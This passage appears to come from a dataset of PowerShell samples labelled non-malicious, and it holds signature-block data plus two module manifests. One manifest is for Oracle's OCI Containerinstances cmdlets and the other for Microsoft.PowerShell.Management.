# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ
# MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjM3MDMtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCJ
# 2x7cQfjpRskJ8UGIctOCkmEkj6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6dG01DAiGA8yMDI0MDQyMzA0MTcy
# NFoYDzIwMjQwNDI0MDQxNzI0WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDp0bTU
# AgEAMAoCAQACAjGvAgH/MAcCAQACAhONMAoCBQDp0wZUAgEAMDYGCisGAQQBhFkK
# BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ
# KoZIhvcNAQELBQADggEBAH2rmFBW9ja5blYWA8Unn8vkMYbXKqIQYgvE+BqIoGGl
# K37iId7RCMnbx36GNiPsxJz+SrXFygUQaAu7nO3U+1iyNgO6YujK/u2s9fA90XRP
# FvVIFpS+hAqsK4PY/wKNme5yRRbrQqWJOdWisM2Q9ynYZdKQ5v77k3VBy5INheyd
# 7Y5mHRAY7C+R69p4O5ljquUnNbyxDY4bnN1qxy9bzlqSNmyvC64VCRL9G4sqNfQq
# s0M4jbIp8qeibUdAC7bHhjZ6J97blDYY4midxnoeqd/SQ/aY4Y85sExh7vJTqL3e
# +mrW8IHCP9vTqFQEuWFyfKEGFVF7aMJM6l8r65vKP5oxggQNMIIECQIBATCBkzB8
# MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk
# bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
# aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeqaJHLVWT9hYwABAAAB
# 6jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE
# MC8GCSqGSIb3DQEJBDEiBCD8ADRVGd5l8cCl04nStlHFXXd91SX3rAIpioemchw6
# zTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICmPodXjZDR4iwg0ltLANXBh
# 5G1uKqKIvq8sjKekuGZ4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB
# IDIwMTACEzMAAAHqmiRy1Vk/YWMAAQAAAeowIgQg+RSQdB8BZiqOVDCLitt1J36/
# frKLmhDLzkN9ACh6oPQwDQYJKoZIhvcNAQELBQAEggIArgCxwEQwsXy3qvXe1GOW
# YdqAl33upte4+15wOxHkKnfyRfmMMZkHKxdguoyMHXi57FvEsnLxY0nMyyhu1j9M
# BoZN7jzejv2gYcHwfd6jN2R/Wv1mvAQ3gOUH4G2ZCBBPca6nKJxHkTrnV5iAC0/Q
# kKZ8bBKcocSMyaJacM+hDu8CYY8HMXRwnMCfeocuC8e96QrgoiVZ2rzow2csY5KX
# ETYUK9vqCQFyzi2ULLhn5tL6MIYn3X8Duax4mZItq3G2dG2ZVT+Eu3TZ+cSsOldC
# fk/70WJghQfboOrqarI2Q43GQwH25YKOJPkRV7axMNcumEQ7p16XqRgtXDJ3Jqhn
# tGxLxHdhEO6uo6ZDHaOGUgm9dBFtqCWPLr8+cXLzMmw2zGVYJymKW+Gx2bGYGgML
# BWnor7prnHPg7VlOJq5UJpB+6x/4lw+d1P4vQDLC0YJNB1iP2ngdx60GQyW5qLEV
# UQzt/XJB9vDWyCc+e33xLERBJntQQg/vwAXfvAdEFfVs5xL17dom+OYSgLCeLrLm
# xA2VYRsNKeFcLHzyzLiPQolsrIhV+4zywDr2Cew/bH2gO1zY9tSiwouLa0s83Cxi
# 40P0gjJ35L1Hy54nB60Jwi51EKZ6kWzbHX15vsxX4EcpIfo2BOqIQYne9nE7SIq5
# l6dEKQafLR/nKNuSmsMtvVg=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_42_86.ps1
|
sample_42_86.ps1
|
#
# Module manifest for module 'OCI.PSModules.Containerinstances'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Containerinstances.dll'
# Version number of this module.
ModuleVersion = '73.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '3c897ac4-90c6-4ac2-9c82-899415d38f04'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Containerinstances Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '73.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Containerinstances.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIContainerinstancesContainer',
'Get-OCIContainerinstancesContainerInstance',
'Get-OCIContainerinstancesContainersList',
'Get-OCIContainerinstanceshapesList',
'Get-OCIContainerinstancesList',
'Get-OCIContainerinstancesWorkRequest',
'Get-OCIContainerinstancesWorkRequestErrorsList',
'Get-OCIContainerinstancesWorkRequestLogsList',
'Get-OCIContainerinstancesWorkRequestsList',
'Invoke-OCIContainerinstancesRetrieveLogs',
'Move-OCIContainerinstancesContainerInstanceCompartment',
'New-OCIContainerinstancesContainerInstance',
'Remove-OCIContainerinstancesContainerInstance',
'Restart-OCIContainerinstancesContainerInstance',
'Start-OCIContainerinstancesContainerInstance',
'Stop-OCIContainerinstancesContainerInstance',
'Update-OCIContainerinstancesContainer',
'Update-OCIContainerinstancesContainerInstance'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Containerinstances'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_67_77.ps1
|
sample_67_77.ps1
|
@{
GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"
Author="PowerShell"
CompanyName="Microsoft Corporation"
Copyright="Copyright (c) Microsoft Corporation."
ModuleVersion="7.0.0.0"
CompatiblePSEditions = @("Core")
PowerShellVersion="3.0"
NestedModules="Microsoft.PowerShell.Commands.Management.dll"
HelpInfoURI = 'https://aka.ms/powershell73-help'
FunctionsToExport = @()
AliasesToExport = @("gcb", "gtz", "scb")
CmdletsToExport=@("Add-Content",
"Clear-Content",
"Clear-ItemProperty",
"Join-Path",
"Convert-Path",
"Copy-ItemProperty",
"Get-ChildItem",
"Get-Clipboard",
"Set-Clipboard",
"Get-Content",
"Get-ItemProperty",
"Get-ItemPropertyValue",
"Move-ItemProperty",
"Get-Location",
"Set-Location",
"Push-Location",
"Pop-Location",
"New-PSDrive",
"Remove-PSDrive",
"Get-PSDrive",
"Get-Item",
"New-Item",
"Set-Item",
"Remove-Item",
"Move-Item",
"Rename-Item",
"Copy-Item",
"Clear-Item",
"Invoke-Item",
"Get-PSProvider",
"New-ItemProperty",
"Split-Path",
"Test-Path",
"Get-Process",
"Stop-Process",
"Wait-Process",
"Debug-Process",
"Start-Process",
"Test-Connection",
"Remove-ItemProperty",
"Rename-ItemProperty",
"Resolve-Path",
"Set-Content",
"Set-ItemProperty",
"Get-TimeZone",
"Stop-Computer",
"Restart-Computer")
}
# SIG # Begin signature block
# MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCC7VSKADi66xWJM
# 6HEA1fH30eG2InNZKlDJZkesFZvWeqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIOH5sRkkqFV4tm2L8Ww9Nazk
# vwEuj6sw3rJoUClckmtaMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEASw9qPBr2D26c4DJUtEgR1sKtpXKZoemG32esSLn4w3MduZQq0+6+T9xw
# VErPr8+5fxrk4TSYNMEaOVNHNZ4DG2PbXpKoZvxTG8ohL/gZxPKzaa7wCMswzCXH
# bURyCt+ndFxHrpVQL2Mj1nTf0eyCIzcta7/Y/Nz4gkvC88t8SfTbTqt4e0CqbGuw
# R5vkBVdKTVJ6ufdCBCr5IP31ggm6NxcJVBB0xvMK5HZmY2Uw4KSSaL2ATExO/dpe
# 9+28PKGF5UMjMpFA2OBL6w2Q9yG6XaxWEgdTqlDtplOpkeROOcZ/FHpmatbhUWBE
# 6yGSzrMO83nn2TDas9ByOueXZIyMzKGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC
# F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCAA0Xk9ogon3tGAm/+JwVPrmpcx7kI3uReVzIdjAxqClQIGZkZGQC/a
# GBMyMDI0MDYxMzAxMTcwMC44NDNaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RjAwMi0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHqMIIHIDCCBQigAwIBAgITMwAAAfI+MtdkrHCRlAABAAAB8jANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# NThaFw0yNTAzMDUxODQ1NThaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RjAwMi0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQC85fPLFwppYgxwYxkSEeYvQBtnYJTtKKj2FKxzHx0f
# gV6XgIIrmCWmpKl9IOzvOfJ/k6iP0RnoRo5F89Ad29edzGdlWbCj1Qyx5HUHNY8y
# u9ElJOmdgeuNvTK4RW4wu9iB5/z2SeCuYqyX/v8z6Ppv29h1ttNWsSc/KPOeuhzS
# AXqkA265BSFT5kykxvzB0LxoxS6oWoXWK6wx172NRJRYcINfXDhURvUfD70jioE9
# 2rW/OgjcOKxZkfQxLlwaFSrSnGs7XhMrp9TsUgmwsycTEOBdGVmf1HCD7WOaz5EE
# cQyIS2BpRYYwsPMbB63uHiJ158qNh1SJXuoL5wGDu/bZUzN+BzcLj96ixC7wJGQM
# BixWH9d++V8bl10RYdXDZlljRAvS6iFwNzrahu4DrYb7b8M7vvwhEL0xCOvb7WFM
# sstscXfkdE5g+NSacphgFfcoftQ5qPD2PNVmrG38DmHDoYhgj9uqPLP7vnoXf7j6
# +LW8Von158D0Wrmk7CumucQTiHRyepEaVDnnA2GkiJoeh/r3fShL6CHgPoTB7oYU
# /d6JOncRioDYqqRfV2wlpKVO8b+VYHL8hn11JRFx6p69mL8BRtSZ6dG/GFEVE+fV
# mgxYfICUrpghyQlETJPITEBS15IsaUuW0GvXlLSofGf2t5DAoDkuKCbC+3VdPmlY
# VQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFJVbhwAm6tAxBM5cH8Bg0+Y64oZ5MB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
